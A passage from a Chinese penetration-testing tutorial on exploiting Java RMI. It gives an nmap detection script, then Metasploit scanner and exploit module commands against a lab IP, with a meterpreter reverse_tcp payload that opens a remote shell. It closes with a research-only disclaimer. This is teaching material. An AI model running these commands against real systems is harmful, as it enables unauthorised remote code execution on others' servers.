还可以使用nmap进行漏洞探测:
nmap --script=rmi-vuln-classloader ip -p port
对漏洞的探测,Metasploitable也具备扫描模块。先查找java rmi漏洞扫描模块。
search java_rmi
使用监听模块。
use auxiliary/scanner/misc/java_rmi_server
配置好目标ip,执行,可以查看到漏洞存在。
set rhosts 192.168.52.82
run
接着切换漏洞利用模块。
use exploit/multi/misc/java_rmi_server
除了设置好目标RHOSTS外,还需要设置监听模块。
Set payload /java/meterpreter/reverse_tcp
执行成功。执行多次,建立的sessions通过exp打完后都会断掉。这时候需要查看sessions。
查看sessions。
原文始发于微信公众号(Enginge):JAVA RMI的漏洞利用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论